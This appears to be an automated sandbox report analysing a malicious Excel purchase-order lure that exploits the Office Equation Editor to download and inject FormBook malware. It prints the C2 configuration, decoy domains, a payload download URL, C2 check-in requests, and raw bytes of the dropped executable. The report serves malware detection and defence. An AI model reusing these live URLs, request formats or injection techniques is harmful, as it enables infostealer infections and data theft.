Windows Analysis Report PO P232-2111228.xlsx

Overview

General Information

Sample Name: PO P232-2111228.xlsx
Analysis ID: 528793
MD5: fe245cc71a6aaff582e5c14d1cb4f79e
SHA1: 5ad55c5abb60501750e154c12eca4347cd07ce41
SHA256: 9e315f448ba10b56fb6e53d39212ac98c9dc5c0c7b6dd3455f3bb65cce4a7a89
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lesventsfavorables.com/ecaq/"], "decoy": ["hanshao886837.com", "darknessinwhite.com", "hermetiktipkombi.com", "donalsupplies.xyz", "fyourscript.com", "emotionfocusedapproaches.com", "companyinteldata.com", "msiscripting.com", "masu-masu-hitomi.com", "melbourneweddingofficiant.com", "trendyhunterr.com", "clawfootdesigns.com", "mrwhiskysteve.com", "enkaguclendirme.com", "ceuta-inversiones.com", "gzz06j.cloud", "tanahvilamalino.online", "click-explore.com", "quanqiu22222.com", "m4ob.com", "jonathandetail.com", "cmarinservices.com", "utiple.com", "creditb2b.com", "playjoker123.club", "tanveermusicacademy.info", "lovebonus.club", "georgebalaam.com", "bossreds.com", "shiftprotection.com", "sifeng.net", "dessinaimprimer.website", "tzryly.com", "riftvalleyfoods.com", "olympicasia.com", "thereserveatstockbridge.com", "allclaimspublicadjusting.com", "braveget.com", "quadrisign.com", "experimentalparadise.com", "turgidharrier.net", "oknafich-sochi.online", "clt12xx.xyz", "cozastore.net", "treeteescoop.com", "jerseystoreofficial.com", "14d7.com", "findur-guide.info", "tornfilmseries.net", "33ghouls.com", "ingleseacolazione.com", "ecofetalrecife.com", "flagimir.store", "myauroma.com", "sodavaranmali.com", "charzed.com", "lovelyurls.com", "primesolucoes.digital", "thinkpod.website", "232689tyc.com", "firedbybiden.com", "roelboogaard.com", "gomesmodeling.com", "tutoringangels.com"]}
Multi AV Scanner detection for submitted file
Source: PO P232-2111228.xlsx Virustotal: Detection: 37% Perma Link
Source: PO P232-2111228.xlsx ReversingLabs: Detection: 37%
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://103.167.92.57/981900000_2/vbc.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsv6C8A.tmp\gqsrfnlttu.dll Avira: detection malicious, Label: HEUR/AGEN.1120891
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 11%
Source: C:\Users\user\AppData\Local\Temp\nsv6C8A.tmp\gqsrfnlttu.dll ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 11%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsv6C8A.tmp\gqsrfnlttu.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.490000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.wscript.exe.2c8796c.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.wscript.exe.252310.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.500818084.0000000000B00000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.465519342.0000000000230000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.466461493.0000000000440000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.500693233.0000000000980000.00000040.00000001.sdmp, wscript.exe, wscript.exe, 00000007.00000002.669177036.00000000023F0000.00000040.00000001.sdmp, wscript.exe, 00000007.00000003.501482698.00000000020E0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.668606015.0000000002270000.00000040.00000001.sdmp, wscript.exe, 00000007.00000003.500502005.0000000001F80000.00000004.00000001.sdmp
Source: Binary string: wscript.pdb source: vbc.exe, 00000005.00000002.501191529.00000000023A0000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.500645492.0000000000899000.00000004.00000020.sdmp
Source: Binary string: wscript.pdbN source: vbc.exe, 00000005.00000002.501191529.00000000023A0000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.500645492.0000000000899000.00000004.00000020.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_00405250
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C22 FindFirstFileA,FindClose, 4_2_00405C22
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402630 FindFirstFileA, 4_2_00402630

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.14d7.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00416287
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_1_00416287
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 7_2_00086287
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.167.92.57:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.167.92.57:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.0.78.25:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.trendyhunterr.com
Source: C:\Windows\explorer.exe Domain query: www.flagimir.store
Source: C:\Windows\explorer.exe Domain query: www.gzz06j.cloud
Source: C:\Windows\explorer.exe Network Connect: 45.139.238.65 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.130.41.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.14d7.com
Source: C:\Windows\explorer.exe Network Connect: 154.23.172.42 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lesventsfavorables.com/ecaq/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TEAM-HOSTASRU TEAM-HOSTASRU
Source: Joe Sandbox View ASN Name: BEGET-ASRU BEGET-ASRU
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=+tTxZdgcqU79mMd7wf6ovAKHVoLw/EhrDF3C/ckFTtMjuwl+tr3xRs8m7m6dFdAioc4v8g== HTTP/1.1Host: www.14d7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=4YbOQk8AO0vy4k2VmRJxI3NcMocUM9+uNZ05HSgMgTndh1RwRX9NSBB2ccr9KRceRZRXnw== HTTP/1.1Host: www.gzz06j.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?z6BXjz6=qIaOAylHD+7nuLCKVj0dqMEagOlqUztLhCHwuYmgFKo0pBs1u2Qf4sHa5T8Epw0dehH0mQ==&k0Dli=0bA4dpDh3xCt HTTP/1.1Host: www.flagimir.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=Auz5euyZ0mn/RqJ0JcD8xijjXrO6gdmIQxpKfZB0kleOtIEmrjANtIGBIbrQdiyKeV2Adg== HTTP/1.1Host: www.trendyhunterr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.25 192.0.78.25
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:32:22 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 25 Nov 2021 07:55:41 GMTETag: "47b2c-5d1984d0e68d2"Accept-Ranges: bytesContent-Length: 293676Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 70 03 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /981900000_2/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 18:33:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeSet-Cookie: security_session_verify=c9f037390686e1f1b209e91751a02cf8; expires=Mon, 29-Nov-21 02:33:39 GMT; path=/; HttpOnlyData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 25 Nov 2021 18:33:54 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 285Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 6c 61 67 69 6d 69 72 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecaq/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.flagimir.store Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: explorer.exe, 00000006.00000000.470109547.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.490261983.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.470109547.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.470109547.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.546313816.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.546313816.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.465629043.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.458602137.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.463024693.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.465629043.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.458602137.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.463024693.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.466372738.0000000002280000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.469265173.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.480395479.0000000003E50000.00000002.00020000.sdmp, wscript.exe, 00000007.00000002.668266637.0000000001C80000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.505396929.0000000001E00000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.546313816.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.490261983.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.490261983.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.546313816.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.466372738.0000000002280000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.469265173.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.490261983.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.470109547.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.546313816.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.490261983.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.491227792.00000000071C7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552670617.00000000071C7000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.470109547.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.491836650.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553074329.0000000008374000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/cBg
